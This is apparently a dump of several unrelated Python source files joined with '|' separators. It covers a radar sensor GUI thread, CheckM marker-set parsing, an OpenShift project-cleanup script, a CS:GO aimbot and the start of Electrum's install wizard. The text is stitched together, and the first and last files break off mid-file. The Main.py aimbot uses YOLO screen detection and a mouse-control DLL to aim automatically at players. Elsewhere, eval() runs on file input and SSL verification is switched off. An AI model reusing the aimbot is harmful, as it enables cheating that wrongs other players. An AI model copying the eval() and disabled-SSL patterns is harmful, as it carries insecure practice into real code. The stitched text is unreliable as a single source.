module_label = module_info.label
return self.module_label_to_processing_config_map[module_label]
def get_default_processing_config(self, module_label=None):
if module_label is not None:
module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
else:
module_info = self.current_module_info
module = module_info.module
if module is None or not hasattr(module, "get_processing_config"):
return {}
return module.get_processing_config()
@property
def in_supported_mode(self):
try:
return self.get_sensor_config().mode in self.client.supported_modes
except (AttributeError, TypeError):
return None
class Threaded_Scan(QtCore.QThread):
sig_scan = pyqtSignal(str, str, object)
def __init__(self, params, parent=None):
QtCore.QThread.__init__(self, parent)
self.client = parent.client
self.radar = parent.radar
self.sensor_config = params["sensor_config"]
self.params = params
self.data = parent.data
self.parent = parent
self.running = True
self.finished.connect(self.stop_thread)
def stop_thread(self):
self.quit()
def run(self):
if self.params["data_source"] == "stream":
record = None
try:
session_info = self.client.setup_session(self.sensor_config)
self.emit("session_info", "", session_info)
self.radar.prepare_processing(self, self.params, session_info)
self.client.start_session()
except clients.base.SessionSetupError:
self.running = False
self.emit("session_setup_error", "")
except Exception as e:
traceback.print_exc()
self.emit(
"client_error",
"Failed to setup streaming!\n" "{}".format(self.format_error(e)),
)
self.running = False
try:
while self.running:
info, sweep = self.client.get_next()
self.emit("sweep_info", "", info)
_, record = self.radar.process(sweep, info)
except Exception as e:
traceback.print_exc()
msg = "Failed to communicate with server!\n{}".format(self.format_error(e))
self.emit("client_error", msg)
try:
self.client.stop_session()
except Exception:
pass
if record is not None and len(record.data) > 0:
self.emit("scan_data", "", record)
elif self.params["data_source"] == "file":
self.emit("session_info", "ok", self.data.session_info)
try:
self.radar.prepare_processing(self, self.params, self.data.session_info)
self.radar.process_saved_data(self.data, self)
except Exception as e:
traceback.print_exc()
error = self.format_error(e)
self.emit("processing_error", "Error while replaying data:<br>" + error)
else:
self.emit("error", "Unknown mode %s!" % self.mode)
self.emit("scan_done", "", "")
def receive(self, message_type, message, data=None):
if message_type == "stop":
if self.running:
self.running = False
self.radar.abort_processing()
elif message_type == "update_feature_extraction":
self.radar.update_feature_extraction(message, data)
elif message_type == "update_feature_list":
self.radar.update_feature_list(data)
else:
print("Scan thread received unknown signal: {}".format(message_type))
def emit(self, message_type, message, data=None):
self.sig_scan.emit(message_type, message, data)
def format_error(self, e):
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
err = "{}\n{}\n{}\n{}".format(exc_type, fname, exc_tb.tb_lineno, e)
return err
def sigint_handler(gui):
event = threading.Event()
thread = threading.Thread(target=watchdog, args=(event,))
thread.start()
gui.closeEvent()
event.set()
thread.join()
def watchdog(event):
flag = event.wait(1)
if not flag:
print("\nforcing exit...")
os._exit(1)
if __name__ == "__main__":
if lib_version_up_to_date():
utils.config_logging(level=logging.INFO)
# Enable warnings to be printed to the log, e.g. DeprecationWarning
warnings.simplefilter("module")
app = QApplication(sys.argv)
ex = GUI()
signal.signal(signal.SIGINT, lambda *_: sigint_handler(ex))
# Makes sure the signal is caught
timer = QtCore.QTimer()
timer.timeout.connect(lambda: None)
timer.start(200)
sys.exit(app.exec_())
|
markerSets.py | ###############################################################################
#
# markerSet.py - Calculate and process marker sets.
#
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
import os
import sys
import logging
import uuid
import tempfile
import shutil
import multiprocessing as mp
import cPickle as pickle
import gzip
from checkm.defaultValues import DefaultValues
from checkm.hmmer import HMMERRunner
from checkm.hmmerModelParser import HmmModelParser
from checkm.util.pfam import PFAM
class BinMarkerSets():
"""A collection of one or more marker sets associated with a bin."""
# type of marker set
TAXONOMIC_MARKER_SET = 1
TREE_MARKER_SET = 2
HMM_MODELS_SET = 3
def __init__(self, binId, markerSetType):
self.logger = logging.getLogger()
self.markerSets = []
self.binId = binId
self.markerSetType = markerSetType
self.selectedLinageSpecificMarkerSet = None
def numMarkerSets(self):
"""Number of marker sets associated with bin."""
return len(self.markerSets)
def addMarkerSet(self, markerSet):
"""Add marker set to bin."""
self.markerSets.append(markerSet)
def markerSetIter(self):
"""Generator function for iterating over marker sets."""
for markerSet in self.markerSets:
yield markerSet
def getMarkerGenes(self):
"""Get marker genes from all marker sets."""
markerGenes = set()
for ms in self.markerSets:
markerGenes.update(ms.getMarkerGenes())
return markerGenes
def mostSpecificMarkerSet(self):
return self.markerSets[0]
def treeMarkerSet(self):
pass
def selectedMarkerSet(self):
"""Return the 'selected' marker set for this bin."""
if self.markerSetType == self.TAXONOMIC_MARKER_SET:
return self.mostSpecificMarkerSet()
elif self.markerSetType == self.TREE_MARKER_SET:
return self.selectedLinageSpecificMarkerSet
else:
# there should be a single marker set associate with this bin
if len(self.markerSets) == 1:
return self.markerSets[0]
self.logger.error(' [Error] Expect a single marker set to be associated with each bin.')
sys.exit()
def setLineageSpecificSelectedMarkerSet(self, selectedMarkerSetMap):
uid = self.mostSpecificMarkerSet().UID
selectedId = selectedMarkerSetMap[uid]
self.selectedLinageSpecificMarkerSet = None
while not self.selectedLinageSpecificMarkerSet:
for ms in self.markerSets:
if ms.UID == selectedId:
self.selectedLinageSpecificMarkerSet = ms
break
if not self.selectedLinageSpecificMarkerSet:
# This is a hack for the reduced tree. Since not all
# marker sets are in the reduced tree it is possible the
# selected marker set might not be avaliable. In this case,
# we should move to the next suitable marker set. Ideally,
# this could be avoided by just forcing in the selected
# marker set.
selectedId = selectedMarkerSetMap[selectedId]
else:
break
if self.selectedLinageSpecificMarkerSet == None:
# something has gone wrong
self.logger.error(' [Error] Failed to set a selected lineage-specific marker set.')
sys.exit()
def removeMarkers(self, markersToRemove):
"""Remove specified markers from all marker sets."""
for markerSet in self.markerSets:
curMarkerSet = markerSet.markerSet
newMarkerSet = []
for ms in curMarkerSet:
newMS = ms - markersToRemove
if len(newMS) != 0:
newMarkerSet.append(newMS)
markerSet.markerSet = newMarkerSet
def write(self, fout):
"""Write marker set to file."""
fout.write(self.binId)
fout.write('\t' + str(len(self.markerSets)))
for ms in self.markerSets:
fout.write('\t' + str(ms))
fout.write('\n')
def read(self, line):
"""Construct bin marker set data from line."""
lineSplit = line.split('\t')
numMarkerSets = int(lineSplit[1])
for i in xrange(0, numMarkerSets):
uid = lineSplit[i * 4 + 2]
lineageStr = lineSplit[i * 4 + 3]
numGenomes = int(lineSplit[i * 4 + 4])
markerSet = eval(lineSplit[i * 4 + 5])
self.markerSets.append(MarkerSet(uid, lineageStr, numGenomes, markerSet))
class MarkerSet():
"""A collection of marker genes organized into co-located sets."""
def __init__(self, UID, lineageStr, numGenomes, markerSet):
self.logger = logging.getLogger()
self.UID = UID # unique ID of marker set
self.lineageStr = lineageStr # taxonomic string associated with marker set
self.numGenomes = numGenomes # number of genomes used to calculate marker set
self.markerSet = markerSet # marker genes organized into co-located sets
def __repr__(self):
return str(self.UID) + '\t' + self.lineageStr + '\t' + str(self.numGenomes) + '\t' + str(self.markerSet)
def size(self):
"""Number of marker genes and marker gene sets."""
numMarkerGenes = 0
for m in self.markerSet:
numMarkerGenes += len(m)
return numMarkerGenes, len(self.markerSet)
def numMarkers(self):
"""Number of marker genes."""
return self.size()[0]
def numSets(self):
"""Number of marker sets."""
return len(self.markerSet)
def getMarkerGenes(self):
"""Get marker genes within marker set."""
markerGenes = set()
for m in self.markerSet:
for marker in m:
markerGenes.add(marker)
return markerGenes
def removeMarkers(self, markersToRemove):
"""Remove specified markers from marker sets."""
newMarkerSet = []
for ms in self.markerSet:
newMS = ms - markersToRemove
if len(newMS) != 0:
newMarkerSet.append(newMS)
self.markerSet = newMarkerSet
def genomeCheck(self, hits, bIndividualMarkers):
"""Calculate genome completeness and contamination."""
if bIndividualMarkers:
present = 0
multiCopyCount = 0
for marker in self.getMarkerGenes():
if marker in hits:
present += 1
multiCopyCount += (len(hits[marker]) - 1)
percComp = 100 * float(present) / self.numMarkers()
percCont = 100 * float(multiCopyCount) / self.numMarkers()
else:
comp = 0.0
cont = 0.0
for ms in self.markerSet:
present = 0
multiCopy = 0
for marker in ms:
count = len(hits.get(marker, []))
if count == 1:
present += 1
elif count > 1:
present += 1
multiCopy += (count - 1)
comp += float(present) / len(ms)
cont += float(multiCopy) / len(ms)
percComp = 100 * comp / len(self.markerSet)
percCont = 100 * cont / len(self.markerSet)
return percComp, percCont
class MarkerSetParser():
"""Parse marker set file."""
def __init__(self, threads=1):
self.logger = logging.getLogger()
self.numThreads = threads
def getMarkerSets(self, outDir, binIds, markerFile, excludeMarkersFile=None):
"""Determine marker set for each bin."""
# determine type of marker set file
markerFileType = self.markerFileType(markerFile)
# get marker set for each bin
binIdToBinMarkerSets = {}
if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
binMarkerSets = self.parseTaxonomicMarkerSetFile(markerFile)
for binId in binIds:
binIdToBinMarkerSets[binId] = binMarkerSets
elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
binIdToBinMarkerSets = self.parseLineageMarkerSetFile(markerFile)
else:
markers = [set()]
modelParser = HmmModelParser(markerFile)
for model in modelParser.parse():
markers[0].add(model.acc)
markerSet = MarkerSet(0, "N/A", -1, markers)
for binId in binIds:
binMarkerSets = BinMarkerSets(binId, BinMarkerSets.HMM_MODELS_SET)
binMarkerSets.addMarkerSet(markerSet)
binIdToBinMarkerSets[binId] = binMarkerSets
# remove marker genes specified by user or marker for exclusion
markersToExclude = set()
if excludeMarkersFile:
markersToExclude = self.readExcludeMarkersFile(excludeMarkersFile)
markersToExclude.update(DefaultValues.MARKERS_TO_EXCLUDE)
for binId, binMarkerSet in binIdToBinMarkerSets.iteritems():
binMarkerSet.removeMarkers(markersToExclude)
return binIdToBinMarkerSets
def readExcludeMarkersFile(self, excludeMarkersFile):
"""Parse file specifying markers to exclude."""
markersToExclude = set()
for line in open(excludeMarkersFile):
if line[0] == '#':
continue
marker = line.strip()
markersToExclude.add(marker)
return markersToExclude
def createHmmModels(self, outDir, binIds, markerFile):
"""Create HMM model for each bins marker set."""
# determine type of marker set file
markerFileType = self.markerFileType(markerFile)
# get HMM file for each bin
binIdToModels = {}
if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
hmmModelFile = self.createHmmModelFile(binIds.keys()[0], markerFile)
modelParser = HmmModelParser(hmmModelFile)
models = modelParser.models()
for binId in binIds:
binIdToModels[binId] = models
os.remove(hmmModelFile)
elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
binIdToModels = self.__createLineageHmmModels(binIds, markerFile)
else:
modelParser = HmmModelParser(markerFile)
models = modelParser.models()
for binId in binIds:
binIdToModels[binId] = models
return binIdToModels
def createHmmModelFile(self, binId, markerFile):
"""Create HMM file for from a bin's marker set."""
# determine type of marker set file
markerFileType = self.markerFileType(markerFile)
# create HMM file
hmmModelFile = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
binMarkerSets = self.parseTaxonomicMarkerSetFile(markerFile)
self.__createMarkerHMMs(binMarkerSets, hmmModelFile, bReportProgress=False)
elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
binIdToBinMarkerSets = self.parseLineageMarkerSetFile(markerFile)
self.__createMarkerHMMs(binIdToBinMarkerSets[binId], hmmModelFile, bReportProgress=False)
else:
shutil.copyfile(markerFile, hmmModelFile)
return hmmModelFile
def __createLineageHmmModels(self, binIds, markerFile):
"""Create lineage-specific HMMs for each bin."""
self.logger.info(' Extracting lineage-specific HMMs with %d threads:' % self.numThreads)
workerQueue = mp.Queue()
writerQueue = mp.Queue()
for binId in binIds:
workerQueue.put(binId)
for _ in range(self.numThreads):
workerQueue.put(None)
binIdToModels = mp.Manager().dict()
try:
calcProc = [mp.Process(target=self.__fetchModelInfo, args=(binIdToModels, markerFile, workerQueue, writerQueue)) for _ in range(self.numThreads)]
writeProc = mp.Process(target=self.__reportFetchProgress, args=(len(binIds), writerQueue))
writeProc.start()
for p in calcProc:
p.start()
for p in calcProc:
p.join()
writerQueue.put(None)
writeProc.join()
except:
# make sure all processes are terminated
for p in calcProc:
p.terminate()
writeProc.terminate()
# create a standard dictionary from the managed dictionary
d = {}
for binId in binIdToModels.keys():
d[binId] = binIdToModels[binId]
return d
def __fetchModelInfo(self, binIdToModels, markerFile, queueIn, queueOut):
"""Fetch HMM."""
while True:
binId = queueIn.get(block=True, timeout=None)
if binId == None:
break
hmmModelFile = self.createHmmModelFile(binId, markerFile)
modelParser = HmmModelParser(hmmModelFile)
binIdToModels[binId] = modelParser.models()
os.remove(hmmModelFile)
queueOut.put(binId)
def __reportFetchProgress(self, numBins, queueIn):
"""Report progress of extracted HMMs."""
numProcessedBins = 0
if self.logger.getEffectiveLevel() <= logging.INFO:
statusStr = ' Finished extracting HMMs for %d of %d (%.2f%%) bins.' % (numProcessedBins, numBins, float(numProcessedBins) * 100 / numBins)
sys.stderr.write('%s\r' % statusStr)
sys.stderr.flush()
while True:
binId = queueIn.get(block=True, timeout=None)
if binId == None:
break
if self.logger.getEffectiveLevel() <= logging.INFO:
numProcessedBins += 1
statusStr = ' Finished extracting HMMs for %d of %d (%.2f%%) bins.' % (numProcessedBins, numBins, float(numProcessedBins) * 100 / numBins)
sys.stderr.write('%s\r' % statusStr)
sys.stderr.flush()
if self.logger.getEffectiveLevel() <= logging.INFO:
sys.stderr.write('\n')
def markerFileType(self, markerFile):
"""Determine type of marker file."""
with open(markerFile, 'r') as f:
header = f.readline()
if DefaultValues.TAXON_MARKER_FILE_HEADER in header:
return BinMarkerSets.TAXONOMIC_MARKER_SET
elif DefaultValues.LINEAGE_MARKER_FILE_HEADER in header:
return BinMarkerSets.TREE_MARKER_SET
elif 'HMMER3' in header:
return BinMarkerSets.HMM_MODELS_SET
else:
self.logger.error('Unrecognized file type: ' + markerFile)
sys.exit()
def __createMarkerHMMs(self, binMarkerSet, outputFile, bReportProgress=True):
"""Create HMM file for markers."""
# get list of marker genes
markerGenes = binMarkerSet.getMarkerGenes()
# get all genes from the same clan as any marker gene
pfam = PFAM(DefaultValues.PFAM_CLAN_FILE)
genesInSameClan = pfam.genesInSameClan(markerGenes)
# extract marker genes along with all genes from the same clan
allMarkers = markerGenes | genesInSameClan
if bReportProgress:
self.logger.info(" There are %d genes in the marker set and %d genes from the same PFAM clan." % (len(markerGenes), len(genesInSameClan)))
# create file with all model accession numbers
keyFile = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
fout = open(keyFile, 'w')
for modelAcc in allMarkers:
fout.write(modelAcc + '\n')
fout.close()
# fetch specified models
HF = HMMERRunner(mode='fetch')
HF.fetch(DefaultValues.HMM_MODELS, keyFile, outputFile, bKeyFile=True)
# index the HMM file
if os.path.exists(outputFile + '.ssi'):
os.remove(outputFile + '.ssi')
HF.index(outputFile)
# remove key file
os.remove(keyFile)
def parseTaxonomicMarkerSetFile(self, markerSetFile):
"""Parse marker set from a taxonomic-specific marker set file."""
with open(markerSetFile) as f:
f.readline() # skip header
binLine = f.readline()
taxonId = binLine.split('\t')[0]
binMarkerSets = BinMarkerSets(taxonId, BinMarkerSets.TAXONOMIC_MARKER_SET)
binMarkerSets.read(binLine)
return binMarkerSets
def parseLineageMarkerSetFile(self, markerSetFile):
"""Parse marker sets from a lineage-specific marker set file."""
# read all marker sets
binIdToBinMarkerSets = {}
with open(markerSetFile) as f:
f.readline() # skip header
for line in f:
lineSplit = line.split('\t')
binId = lineSplit[0]
binMarkerSets = BinMarkerSets(binId, BinMarkerSets.TREE_MARKER_SET)
binMarkerSets.read(line)
# determine selected marker set
selectedMarkerSetMap = self.parseSelectedMarkerSetMap()
binMarkerSets.setLineageSpecificSelectedMarkerSet(selectedMarkerSetMap)
binIdToBinMarkerSets[binId] = binMarkerSets
return binIdToBinMarkerSets
def parseSelectedMarkerSetMap(self):
selectedMarkerSetMap = {}
for line in open(DefaultValues.SELECTED_MARKER_SETS):
lineSplit = line.split('\t')
internalID = lineSplit[0]
selectedID = lineSplit[1].rstrip()
selectedMarkerSetMap[internalID] = selectedID
return selectedMarkerSetMap
def writeBinModels(self, binIdToModels, filename):
"""Save HMM model info for each bin to file."""
self.logger.info(' Saving HMM info to file.')
with gzip.open(filename, 'wb') as output:
pickle.dump(binIdToModels, output, pickle.HIGHEST_PROTOCOL)
def loadBinModels(self, filename):
"""Read HMM model info for each bin from file."""
self.logger.info(' Reading HMM info from file.')
with gzip.open(filename, 'rb') as f:
binIdToModels = pickle.load(f)
return binIdToModels
|
delete-projects.py | import threading
import time
import os
from collections import namedtuple
from kubernetes.client.rest import ApiException
from kubernetes.client.configuration import Configuration
from kubernetes.config.incluster_config import load_incluster_config
from kubernetes.client.api_client import ApiClient
from openshift.dynamic import DynamicClient, Resource
service_account_path = '/var/run/secrets/kubernetes.io/serviceaccount'
with open(os.path.join(service_account_path, 'namespace')) as fp:
namespace = fp.read().strip()
with open('/var/run/secrets/kubernetes.io/serviceaccount/namespace') as fp:
namespace = fp.read().strip()
workshop_name = os.environ.get('WORKSHOP_NAME')
application_name = os.environ.get('APPLICATION_NAME')
if not application_name:
workshop_name = application_name
if not workshop_name:
workshop_name = 'homeroom'
service_account_name = '%s-spawner' % application_name
full_service_account_name = 'system:serviceaccount:%s:%s' % (namespace,
service_account_name)
load_incluster_config()
import urllib3
urllib3.disable_warnings()
instance = Configuration()
instance.verify_ssl = False
Configuration.set_default(instance)
api_client = DynamicClient(ApiClient())
pod_resource = api_client.resources.get(
api_version='v1', kind='Pod')
service_account_resource = api_client.resources.get(
api_version='v1', kind='ServiceAccount')
namespace_resource = api_client.resources.get(
api_version='v1', kind='Namespace')
role_binding_resource = api_client.resources.get(
api_version='rbac.authorization.k8s.io/v1', kind='RoleBinding')
project_cache = {}
account_cache = {}
orphan_cache = {}
Namespace = namedtuple('Namespace', ['name', 'account', 'pod'])
def get_projects():
project_details = []
try:
projects = namespace_resource.get(namespace=namespace)
for project in projects.items:
annotations = project.metadata.annotations
if annotations:
if (annotations['spawner/requestor'] == full_service_account_name and
annotations['spawner/namespace'] == namespace and
annotations['spawner/deployment'] == application_name):
project_details.append(Namespace(project.metadata.name,
annotations['spawner/account'],
annotations['spawner/session']))
except Exception as e:
print('ERROR: failed to list projects:', e)
return project_details
def get_accounts():
account_details = []
try:
accounts = service_account_resource.get(namespace=namespace)
for account in accounts.items:
labels = account.metadata.labels
application_label = labels and labels['app']
if application_label == application_name and labels['user']:
account_details.append(account)
except Exception as e:
print('ERROR: failed to list accounts:', e)
return account_details
def pod_exists(name):
try:
pod_resource.get(namespace=namespace, name=name)
return True
except ApiException as e:
if e.status != 404:
print('ERROR: failed to lookup pod %s:' % name, e)
except Exception as e:
print('ERROR: failed to lookup pod %s:' % name, e)
return False
def namespaced_resources():
api_groups = api_client.resources.parse_api_groups()
for api in api_groups.values():
for domain, items in api.items():
for version, group in items.items():
try:
for kind in group.resources:
if domain:
version = '%s/%s' % (domain, version)
resource = api_client.resources.get(api_version=version, kind=kind)
if type(resource) == Resource and resource.namespaced:
yield resource
except Exception:
pass
def purge_project(name):
for resource_type in namespaced_resources():
try:
objects = resource_type.get(namespace=name)
for obj in objects.items:
if obj.metadata.deletionTimestamp and obj.metadata.finalizers:
# Since the project is stuck in terminating, we
# remove any finalizers which might be blocking
# it. Finalizers can be left around with nothing
# to remove them because there is no gaurantee
# what order resources will be deleted when a
# project is deleted. Thus an application, for
# example an operator which would remove the
# finalizer when a CRD is deleted, might get
# deleted before the objects with the finalizer,
# and so the objects can't then be deleted.
body = {
'kind': obj.kind,
'apiVersion': obj.apiVersion,
'metadata': {
'name': obj.metadata.name,
'finalizers': None
}
}
print('WARNING: deleting finalizers on resource: %s' % body)
try:
resource_type.patch(namespace=name, body=body,
content_type='application/merge-patch+json')
except ApiException as e:
print('ERROR: failed to delete finalizers: %s' % body, e)
except Exception as e:
print('ERROR: failed to delete finalizers: %s' % body, e)
except ApiException as e:
if e.status not in (403, 404, 405):
print('ERROR: failed to query resources %s' % resource_type, e)
except Exception as e:
print('ERROR: failed to query resources %s' % resource_type, e)
pass
def delete_project(name):
try:
namespace_resource.delete(name=name)
print('INFO: deleted project %s' % name)
except ApiException as e:
if e.status == 409:
print('WARNING: project %s is still terminating' % name)
purge_project(name)
elif e.status != 404:
print('ERROR: failed to delete project %s:' % name, e)
else:
print('INFO: project %s already deleted' % name)
except Exception as e:
print('ERROR: failed to delete project %s:' % name, e)
def delete_account(name):
try:
service_account_resource.delete(namespace=namespace, name=name)
print('INFO: deleted account %s' % name)
except ApiException as e:
if e.status != 404:
print('ERROR: failed to delete account %s:' % name, e)
else:
print('INFO: account %s already deleted' % name)
except Exception as e:
print('ERROR: failed to delete account %s:' % name, e)
def purge():
now = time.time()
projects = get_projects()
if projects:
print('INFO: checking for projects to be deleted: %s' % projects)
for project in projects:
if not project in project_cache:
project_cache[project] = now
account_cache.setdefault(project.account, set()).add(project)
for project in projects:
if pod_exists(project.pod):
project_cache[project] = now
for project, last_seen in list(project_cache.items()):
if now - last_seen > 90.0:
account_cache[project.account].remove(project)
if not account_cache[project.account]:
delete_account(project.account)
del account_cache[project.account]
delete_project(project.name)
del project_cache[project]
accounts = get_accounts()
for account in accounts:
name = account.metadata.name
if not name in account_cache:
if not name in orphan_cache:
orphan_cache[name] = now
for name, last_seen in list(orphan_cache.items()):
if name in account_cache:
del orphan_cache[name]
elif now - last_seen > 90.0:
delete_account(name)
del orphan_cache[name]
def loop():
while True:
try:
purge()
except Exception as e:
print('ERROR: unexpected exception:', e)
pass
time.sleep(60.0)
thread = threading.Thread(target=loop)
thread.set_daemon = True
thread.start()
thread.join()
|
Main.py | import random
import time
from FPSDetect import *
from ctypes import *
# 加载相关工具函数
from utils.FPSUtils import *
dll = cdll.LoadLibrary(r'lib/Dll.dll') # 加载用C语言封装过的“易键鼠”dll
def shoot_screen():
while True:
img = pyautogui.screenshot(region=[LEFT, TOP, 640, 640]) # region为屏幕截取区域格式为(left,top,w,h)
# 存储游戏过程中的截图的路径
images_path = 'E:/data/CSGO/images/'
img.save(
images_path + str(int(time.time())) + ''.join(
random.sample('zyxwvutsrqponmlkjihgfedcba', 2)) + '.jpg') # 随机生成文件名
time.sleep(0.5)
if __name__ == "__main__":
# ssp = Process(target=shoot_screen, name="ssp", args=())
# ssp.start()
# mPid = PID(0, 0, 1.0, 0) # PID 控制器参数:(真值,p,i,d)(有问题)
while True:
try:
img = ScreenShout() # 截取屏幕检测区域
detections = detect(img) # 送入yolo检测
btc, btp = FindBestCenter(detections) # 确定目标最优的射击中心
if btc is not None: # 如果屏幕区域有射击目标
dll.MoveTo2(int(LEFT + btc[0]), int(TOP + btc[1])) # 调用易键鼠移动鼠标(此处更换为自己的)
# pyautogui.moveTo(int(LEFT + btc[0]), int(TOP + btc[1]))
except:
print('ERROR!')
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
